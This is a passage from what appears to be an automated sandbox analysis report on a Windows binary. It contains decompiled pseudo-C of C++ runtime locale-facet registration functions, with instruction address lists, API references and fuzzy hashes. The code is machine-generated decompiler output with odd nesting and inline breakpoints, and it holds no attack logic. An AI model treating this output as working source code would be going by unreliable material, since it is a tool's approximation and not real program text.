																						 *_t279 = 0x6e22c414;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E1DD028(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E1E0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E1C6FD3(__eflags, _t271);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e286e44 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E1C6FD3(__eflags, _t270);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e286e40 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E1C6FD3(__eflags, _t269);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e286e38 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E1C6FD3(__eflags, _t268);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e286e3c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E1C6FD3(__eflags, _t267);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e286e34 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E1C6FD3(__eflags, _t266);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e286e30 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6e1db898
0x6e1db898
0x6e1db89f
0x6e1db8a9
0x6e1db8ae
0x6e1db8b9
0x6e1db8bd
0x6e1db8c0
0x6e1db8c5
0x6e1db8c9
0x6e1db8ce
0x6e1db8d2
0x6e1db917
0x6e1db91a
0x6e1db926
0x6e1db8d4
0x6e1db8d6
0x6e1db8dc
0x6e1db8e2
0x6e1db8ea
0x6e1db8ed
0x6e1db92a
0x6e1db938
0x6e1db93d
0x6e1db945
0x6e1db94f
0x6e1db954
0x6e1db95f
0x6e1db963
0x6e1db966
0x6e1db96b
0x6e1db974
0x6e1db976
0x6e1db978
0x6e1db9bd
0x6e1db9c0
0x6e1db9cc
0x6e1db97a
0x6e1db97a
0x6e1db97c
0x6e1db982
0x6e1db988
0x6e1db990
0x6e1db993
0x6e1db9d0
0x6e1db9de
0x6e1db9e3
0x6e1db9eb
0x6e1db9f5
0x6e1db9fa
0x6e1dba05
0x6e1dba09
0x6e1dba0c
0x6e1dba11
0x6e1dba1a
0x6e1dba1c
0x6e1dba1e
0x6e1dba63
0x6e1dba66
0x6e1dba72
0x6e1dba20
0x6e1dba20
0x6e1dba22
0x6e1dba28
0x6e1dba2e
0x6e1dba36
0x6e1dba39
0x6e1dba76
0x6e1dba84
0x6e1dba89
0x6e1dba91
0x6e1dba9b
0x6e1dbaa0
0x6e1dbaab
0x6e1dbaaf
0x6e1dbab2
0x6e1dbab7
0x6e1dbac0
0x6e1dbac2
0x6e1dbac4
0x6e1dbb09
0x6e1dbb0c
0x6e1dbb18
0x6e1dbac6
0x6e1dbac6
0x6e1dbac8
0x6e1dbace
0x6e1dbad4
0x6e1dbadc
0x6e1dbadf
0x6e1dbb1c
0x6e1dbb2a
0x6e1dbb2f
0x6e1dbb37
0x6e1dbb41
0x6e1dbb46
0x6e1dbb51
0x6e1dbb55
0x6e1dbb58
0x6e1dbb5d
0x6e1dbb66
0x6e1dbb68
0x6e1dbb6a
0x6e1dbbaf
0x6e1dbbb2
0x6e1dbbbe
0x6e1dbb6c
0x6e1dbb6c
0x6e1dbb6e
0x6e1dbb74
0x6e1dbb7a
0x6e1dbb82
0x6e1dbb85
0x6e1dbbc2
0x6e1dbbd0
0x6e1dbbd5
0x6e1dbbdd
0x6e1dbbe7
0x6e1dbbec
0x6e1dbbf7
0x6e1dbbfb
0x6e1dbbfe
0x6e1dbc03
0x6e1dbc0c
0x6e1dbc0e
0x6e1dbc10
0x6e1dbc55
0x6e1dbc58
0x6e1dbc64
0x6e1dbc12
0x6e1dbc12
0x6e1dbc14
0x6e1dbc1a
0x6e1dbc20
0x6e1dbc28
0x6e1dbc2b
0x6e1dbc65
0x6e1dbc68
0x6e1dbc76
0x6e1dbc7b
0x6e1dbc83
0x6e1dbc88
0x6e1dbc8a
0x6e1dbc90
0x6e1dbc93
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbca0
0x6e1dbca6
0x6e1dbca9
0x6e1dbcb5
0x6e1dbc2d
0x6e1dbc2d
0x6e1dbc30
0x6e1dbc34
0x6e1dbc38
0x6e1dbc45
0x6e1dbc4d
0x6e1dbc4f
0x00000000
0x6e1dbc4f
0x6e1dbc16
0x6e1dbc16
0x00000000
0x6e1dbc16
0x6e1dbc14
0x6e1dbb87
0x6e1dbb87
0x6e1dbb8a
0x6e1dbb8e
0x6e1dbb92
0x6e1dbb9f
0x6e1dbba7
0x6e1dbba9
0x00000000
0x6e1dbba9
0x6e1dbb70
0x6e1dbb70
0x00000000
0x6e1dbb70
0x6e1dbb6e
0x6e1dbae1
0x6e1dbae1
0x6e1dbae4
0x6e1dbae8
0x6e1dbaec
0x6e1dbaf9
0x6e1dbb01
0x6e1dbb03
0x00000000
0x6e1dbb03
0x6e1dbaca
0x6e1dbaca
0x00000000
0x6e1dbaca
0x6e1dbac8
0x6e1dba3b
0x6e1dba3b
0x6e1dba3e
0x6e1dba42
0x6e1dba46
0x6e1dba53
0x6e1dba5b
0x6e1dba5d
0x00000000
0x6e1dba5d
0x6e1dba24
0x6e1dba24
0x00000000
0x6e1dba24
0x6e1dba22
0x6e1db995
0x6e1db995
0x6e1db998
0x6e1db99c
0x6e1db9a0
0x6e1db9ad
0x6e1db9b5
0x6e1db9b7
0x00000000
0x6e1db9b7
0x6e1db97e
0x6e1db97e
0x00000000
0x6e1db97e
0x6e1db97c
0x6e1db8ef
0x6e1db8ef
0x6e1db8f2
0x6e1db8f6
0x6e1db8fa
0x6e1db907
0x6e1db90f
0x6e1db911
0x00000000
0x6e1db911
0x6e1db8d8
0x6e1db8d8
0x00000000
0x6e1db8d8
0x6e1db8d6

APIs

__EH_prolog3.LIBCMT ref: 6E1DB89F
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB8A9
int.LIBCPMT ref: 6E1DB8C0

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DB8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB938

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 880930ce01781a4a03fa8f1737caac5d13fdfe7fbe68ba3640883e8ef13fae08
Instruction ID: c9f1e3159f9ec4fb34ac39465f89b69ca6839ad7977a225371c66b486d63b50d
Opcode Fuzzy Hash: 880930ce01781a4a03fa8f1737caac5d13fdfe7fbe68ba3640883e8ef13fae08
Instruction Fuzzy Hash: E91123B59105198BCF05DBE4C844EFEB37AAF64714F140908E411AB290CF789E88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB93E, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB93E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t242 - 0x14, 0);
				_t231 =  *0x6e286e34; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1A161C(0x6e286e14);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E1C66BA(_t242 - 0x14);
					return E6E1E0075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E1DC0B8(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t242 - 0x20);
							E6E1E3D74(_t242 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t225, _t231, 0x14);
							E6E1C6653(_t242 - 0x14, 0);
							_t232 =  *0x6e286e3c; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1A161C(0x6e286e1c);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E1C66BA(_t242 - 0x14);
								return E6E1E0075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E1DC120(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t242 - 0x20);
										E6E1E3D74(_t242 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t172, _t226, _t232, 0x14);
										E6E1C6653(_t242 - 0x14, 0);
										_t233 =  *0x6e286e38; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1A161C(0x6e286e18);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E1C66BA(_t242 - 0x14);
											return E6E1E0075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E1DC1A4(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t242 - 0x20);
													E6E1E3D74(_t242 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t172, _t227, _t233, 0x14);
													E6E1C6653(_t242 - 0x14, 0);
													_t234 =  *0x6e286e40; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1A161C(0x6e286e20);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E1C66BA(_t242 - 0x14);
														return E6E1E0075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E1DC229(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t242 - 0x20);
																E6E1E3D74(_t242 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t172, _t228, _t234, 0x14);
																E6E1C6653(_t242 - 0x14, 0);
																_t235 =  *0x6e286e44; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1A161C(0x6e286e24);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1A171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E1C66BA(_t242 - 0x14);
																	return E6E1E0075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E1DC295(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1A1438(_t207);
																			E6E1E3D74(_t242 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e22851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e22c414;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E1DD028(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E1E0075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E1C6FD3(__eflags, _t229);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e286e44 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E1C6FD3(__eflags, _t228);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e286e40 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
													 *(_t242 - 0x10) = _t227;
													 *(_t242 - 4) = 1;
													E6E1C6FD3(__eflags, _t227);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t227 + 4))))();
													 *0x6e286e38 = _t227;
													goto L19;
												}
											} else {
												_t227 = _t233;
												goto L19;
											}
										}
									} else {
										_t226 =  *(_t242 - 0x10);
										 *(_t242 - 0x10) = _t226;
										 *(_t242 - 4) = 1;
										E6E1C6FD3(__eflags, _t226);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t226 + 4))))();
										 *0x6e286e3c = _t226;
										goto L12;
									}
								} else {
									_t226 = _t232;
									goto L12;
								}
							}
						} else {
							_t225 =  *(_t242 - 0x10);
							 *(_t242 - 0x10) = _t225;
							 *(_t242 - 4) = 1;
							E6E1C6FD3(__eflags, _t225);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t225 + 4))))();
							 *0x6e286e34 = _t225;
							goto L5;
						}
					} else {
						_t225 = _t231;
						goto L5;
					}
				}
			}

0x6e1db93e
0x6e1db93e
0x6e1db945
0x6e1db94f
0x6e1db954
0x6e1db95f
0x6e1db963
0x6e1db966
0x6e1db96b
0x6e1db96f
0x6e1db974
0x6e1db978
0x6e1db9bd
0x6e1db9c0
0x6e1db9cc
0x6e1db97a
0x6e1db97c
0x6e1db982
0x6e1db988
0x6e1db990
0x6e1db993
0x6e1db9d0
0x6e1db9de
0x6e1db9e3
0x6e1db9eb
0x6e1db9f5
0x6e1db9fa
0x6e1dba05
0x6e1dba09
0x6e1dba0c
0x6e1dba11
0x6e1dba1a
0x6e1dba1c
0x6e1dba1e
0x6e1dba63
0x6e1dba66
0x6e1dba72
0x6e1dba20
0x6e1dba20
0x6e1dba22
0x6e1dba28
0x6e1dba2e
0x6e1dba36
0x6e1dba39
0x6e1dba76
0x6e1dba84
0x6e1dba89
0x6e1dba91
0x6e1dba9b
0x6e1dbaa0
0x6e1dbaab
0x6e1dbaaf
0x6e1dbab2
0x6e1dbab7
0x6e1dbac0
0x6e1dbac2
0x6e1dbac4
0x6e1dbb09
0x6e1dbb0c
0x6e1dbb18
0x6e1dbac6
0x6e1dbac6
0x6e1dbac8
0x6e1dbace
0x6e1dbad4
0x6e1dbadc
0x6e1dbadf
0x6e1dbb1c
0x6e1dbb2a
0x6e1dbb2f
0x6e1dbb37
0x6e1dbb41
0x6e1dbb46
0x6e1dbb51
0x6e1dbb55
0x6e1dbb58
0x6e1dbb5d
0x6e1dbb66
0x6e1dbb68
0x6e1dbb6a
0x6e1dbbaf
0x6e1dbbb2
0x6e1dbbbe
0x6e1dbb6c
0x6e1dbb6c
0x6e1dbb6e
0x6e1dbb74
0x6e1dbb7a
0x6e1dbb82
0x6e1dbb85
0x6e1dbbc2
0x6e1dbbd0
0x6e1dbbd5
0x6e1dbbdd
0x6e1dbbe7
0x6e1dbbec
0x6e1dbbf7
0x6e1dbbfb
0x6e1dbbfe
0x6e1dbc03
0x6e1dbc0c
0x6e1dbc0e
0x6e1dbc10
0x6e1dbc55
0x6e1dbc58
0x6e1dbc64
0x6e1dbc12
0x6e1dbc12
0x6e1dbc14
0x6e1dbc1a
0x6e1dbc20
0x6e1dbc28
0x6e1dbc2b
0x6e1dbc65
0x6e1dbc68
0x6e1dbc76
0x6e1dbc7b
0x6e1dbc83
0x6e1dbc88
0x6e1dbc8a
0x6e1dbc90
0x6e1dbc93
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbca0
0x6e1dbca6
0x6e1dbca9
0x6e1dbcb5
0x6e1dbc2d
0x6e1dbc2d
0x6e1dbc30
0x6e1dbc34
0x6e1dbc38
0x6e1dbc45
0x6e1dbc4d
0x6e1dbc4f
0x00000000
0x6e1dbc4f
0x6e1dbc16
0x6e1dbc16
0x00000000
0x6e1dbc16
0x6e1dbc14
0x6e1dbb87
0x6e1dbb87
0x6e1dbb8a
0x6e1dbb8e
0x6e1dbb92
0x6e1dbb9f
0x6e1dbba7
0x6e1dbba9
0x00000000
0x6e1dbba9
0x6e1dbb70
0x6e1dbb70
0x00000000
0x6e1dbb70
0x6e1dbb6e
0x6e1dbae1
0x6e1dbae1
0x6e1dbae4
0x6e1dbae8
0x6e1dbaec
0x6e1dbaf9
0x6e1dbb01
0x6e1dbb03
0x00000000
0x6e1dbb03
0x6e1dbaca
0x6e1dbaca
0x00000000
0x6e1dbaca
0x6e1dbac8
0x6e1dba3b
0x6e1dba3b
0x6e1dba3e
0x6e1dba42
0x6e1dba46
0x6e1dba53
0x6e1dba5b
0x6e1dba5d
0x00000000
0x6e1dba5d
0x6e1dba24
0x6e1dba24
0x00000000
0x6e1dba24
0x6e1dba22
0x6e1db995
0x6e1db995
0x6e1db998
0x6e1db99c
0x6e1db9a0
0x6e1db9ad
0x6e1db9b5
0x6e1db9b7
0x00000000
0x6e1db9b7
0x6e1db97e
0x6e1db97e
0x00000000
0x6e1db97e
0x6e1db97c

APIs

__EH_prolog3.LIBCMT ref: 6E1DB945
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB94F
int.LIBCPMT ref: 6E1DB966

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DB9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB9DE

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 77350fd4f52f64371bee959c3376c9ecddbb44c681cc5f13c610983af09bbb35
Instruction ID: 0cf8869c9e7fe2bc64747d7e50309e8ab0ccf560e225cbacfe6cf7b543cb4068
Opcode Fuzzy Hash: 77350fd4f52f64371bee959c3376c9ecddbb44c681cc5f13c610983af09bbb35
Instruction Fuzzy Hash: A31159B591051CCBCF05EBE4C894EFEB37AAF54704F140908E521AB290CF749D88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF94B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF94B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t286 - 0x14, 0);
				_t273 =  *0x6e286ddc; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1A161C(0x6e286d88);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E1C66BA(_t286 - 0x14);
					return E6E1E0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E1D1409(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t286 - 0x20);
							E6E1E3D74(_t286 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t266, _t273, 0x14);
							E6E1C6653(_t286 - 0x14, 0);
							_t274 =  *0x6e286de0; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1A161C(0x6e286d8c);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E1C66BA(_t286 - 0x14);
								return E6E1E0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E1D1471(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t286 - 0x20);
										E6E1E3D74(_t286 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t203, _t267, _t274, 0x14);
										E6E1C6653(_t286 - 0x14, 0);
										_t275 =  *0x6e286dfc; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1A161C(0x6e286da8);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E1C66BA(_t286 - 0x14);
											return E6E1E0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E1D14EC(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t286 - 0x20);
													E6E1E3D74(_t286 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t203, _t268, _t275, 0x14);
													E6E1C6653(_t286 - 0x14, 0);
													_t276 =  *0x6e286dcc; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1A161C(0x6e286d80);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E1C66BA(_t286 - 0x14);
														return E6E1E0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E1D1558(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t286 - 0x20);
																E6E1E3D74(_t286 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t203, _t269, _t276, 0x14);
																E6E1C6653(_t286 - 0x14, 0);
																_t277 =  *0x6e286e00; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1A161C(0x6e286dac);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E1C66BA(_t286 - 0x14);
																	return E6E1E0075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E1D15C4(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t286 - 0x20);
																			E6E1E3D74(_t286 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t203, _t270, _t277, 0x14);
																			E6E1C6653(_t286 - 0x14, 0);
																			_t278 =  *0x6e286dd0; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1A161C(0x6e286d60);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1A171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E1C66BA(_t286 - 0x14);
																				return E6E1E0075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E1D162A(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1A1438(_t245);
																						E6E1E3D74(_t286 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e22851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e22c0c4;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E1D542F(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E1E0075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E1C6FD3(__eflags, _t271);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e286dd0 = _t271;
